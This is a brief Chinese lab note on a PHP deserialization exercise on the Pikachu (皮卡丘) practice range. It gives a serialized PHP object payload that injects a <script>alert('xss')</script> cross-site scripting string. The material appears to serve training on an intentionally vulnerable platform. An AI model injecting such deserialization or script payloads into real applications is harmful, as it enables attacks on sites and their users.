实验平台: 皮卡丘靶场—PHP反序列化 实验步骤: 输入无害字符串: 在PHP中制定一个类,并指定一个恶意的JavaScript: payload: O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}